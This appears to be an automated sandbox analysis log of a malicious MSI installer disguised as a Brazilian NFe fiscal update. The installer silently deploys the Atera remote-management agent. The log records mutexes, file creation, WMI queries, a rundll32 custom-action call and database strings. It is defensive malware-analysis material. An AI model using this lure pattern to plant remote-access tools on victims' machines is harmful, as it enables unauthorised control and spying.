Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B959505	36_2_00007FFD9B959505
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9B960CB0	36_2_00007FFD9B960CB0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BA235A2	36_2_00007FFD9BA235A2
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BBD3F80	36_2_00007FFD9BBD3F80
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BBC02D7	36_2_00007FFD9BBC02D7
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BBC6A67	36_2_00007FFD9BBC6A67
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BBCC86C	36_2_00007FFD9BBCC86C
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFD9BBC9C65	36_2_00007FFD9BBC9C65

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: String function: 00007FFDF0FD06B0 appears 145 times
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: String function: 00007FFDF0FD1B70 appears 102 times
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: String function: 00007FFDF0FD1D30 appears 114 times

Source: Atualizador_Fiscal_NFe_37882912.msi	Binary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs Atualizador_Fiscal_NFe_37882912.msi
Source: Atualizador_Fiscal_NFe_37882912.msi	Binary or memory string: OriginalFilenameSfxCA.dll\ vs Atualizador_Fiscal_NFe_37882912.msi
Source: Atualizador_Fiscal_NFe_37882912.msi	Binary or memory string: OriginalFilenamewixca.dll\ vs Atualizador_Fiscal_NFe_37882912.msi

Source: ICSharpCode.SharpZipLib.dll.1.dr, InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.1.dr, DeflaterOutputStream.cs	Cryptographic APIs: 'TransformBlock'
Source: ICSharpCode.SharpZipLib.dll.1.dr, ZipAESTransform.cs	Cryptographic APIs: 'TransformBlock'

Source: AteraAgent.exe.1.dr, SignatureValidator.cs	Base64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
Source: AteraAgent.exe0.1.dr, SignatureValidator.cs	Base64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winMSI@104/552@0/12

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ATERA Networks

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Mutant created: \BaseNamedObjects\Global\Access_ISABUS.HTP.Method
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Mutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_chocolatey.log
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Mutant created: \BaseNamedObjects\NLogMutexTester
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Mutant created: \BaseNamedObjects\Global\NLog-FileFileArchiveLock-c:_program files (x86)_atera networks_ateraagent_packages_agentpackagemonitoring_log.txt
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Mutant created: \BaseNamedObjects\Global\{bd59231e-97d1-4fc0-a975-80c3fed498b7}
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Mutant created: \BaseNamedObjects\Global\Access_PCI
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Mutant created: \BaseNamedObjects\C__Program Files (x86)_ATERA Networks_AteraAgent_Packages_AgentPackageProgramManagement_logs_choco.summary.log
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7588:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF02DC3C0CC880FEF6.TMP

Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AteraAgent.exe")
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

File read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA89C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5744953 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId

Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: SELECT Identifier, Severity, Timestamp FROM ThresholdDuration WHERE Identifier = @id;kDELETE FROM ThresholdDuration WHERE Identifier = @id;
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);@X9
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);@X9
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO ThresholdDuration (Identifier,Severity,Timestamp) Values (@identifier, @severity, @timestamp) ON CONFLICT (Identifier) DO UPDATE SET Severity = excluded.Severity, Timestamp = excluded.Timestamp;
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);kExecuteScriptAsync SystemTools Start scriptGuid : {0}Wrunscriptguid {0} 10 W10= disableSendResult
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247805AA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2805B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;@X9
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680298000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS AlertedEvents_V2 (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL, LogName TEXT NOT NULL, Severity INTEGER NOT NULL, RecordId BIGINT NOT NULL, EventId BIGINT NOT NULL, Source TEXT NOT NULL, Message TEXT NULL); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_Timestamp ON AlertedEvents_V2 (Timestamp); CREATE INDEX IF NOT EXISTS idx_AlertedEvents_V2_LogName ON AlertedEvents_V2 (LogName);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS StatisticsSendTime (Id INTEGER PRIMARY KEY,Timestamp BIGINT NOT NULL);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: INSERT INTO Statistics(Name, Timestamp, Value) Values (@name, @timestamp, @value);%StatisticsSendTime
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Stub (Id INTEGER PRIMARY KEY, Timestamp BIGINT NOT NULL);
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568056B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO StatisticsSendTime (Timestamp) Values (@timestamp);
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.0000025680426000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [AlertsSent] (Timestamp, Alerts) VALUES (@timestamp, @alerts);
Source: AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL);
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL); CREATE UNIQUE INDEX IF NOT EXISTS idx_ThresholdDuration_Identifier ON ThresholdDuration (Identifier);@X9
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT Timestamp FROM StatisticsSendTime ORDER BY Timestamp DESC LIMIT 1;
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);sSELECT MAX([Timestamp]) AS [TimeStamp] FROM [AlertsSent];
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: AgentPackageMonitoring.exe, 00000024.00000002.2220369033.00000247F9845000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);M
Source: AgentPackageMonitoring.exe, 00000033.00000002.2655425408.000002568048A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT Id, Name, Timestamp, Value FROM Statistics;
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: SELECT [Id], [Alerts], [Timestamp] FROM [AlertsSent] ORDER BY [Timestamp] DESC LIMIT 1;
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);/DELETE FROM Statistics;eSELECT Id, Name, Timestamp, Value FROM Statistics;
Source: AgentPackageMonitoring.exe, 00000024.00000002.2220369033.00000247F9845000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS [AlertsSent] (Id INTEGER NOT NULL PRIMARY KEY, Timestamp BIGINT NOT NULL, Alerts TEXT NOT NULL);
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000033.00000002.2655425408.00000256800E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdsProfiles (Id INTEGER NOT NULL PRIMARY KEY,IsActive BOOLEAN NOT NULL,Timestamp BIGINT NOT NULL,Name TEXT NOT NULL,Thresholds TEXT NOT NULL); CREATE INDEX IF NOT EXISTS idx_ThresholdsProfiles_Timestamp ON ThresholdsProfiles (Timestamp);
Source: AgentPackageMonitoring.exe, AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS Statistics (Id INTEGER PRIMARY KEY,Name TEXT NOT NULL,Timestamp BIGINT NOT NULL,Value TEXT NOT NULL);@X9
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247805AA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2805B3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO ThresholdsProfiles (IsActive,Timestamp,Name,Thresholds) Values (@isActive,@timestamp,@name,@thresholds); DELETE FROM ThresholdsProfiles WHERE Timestamp < @timeToDelete;
Source: AgentPackageMonitoring.exe, 00000024.00000002.2211260331.00000247800ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2352910675.000001C2800EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS ThresholdDuration (Id INTEGER PRIMARY KEY,Identifier TEXT NOT NULL,Severity TEXT NOT NULL,Timestamp BIGINT NOT NULL);
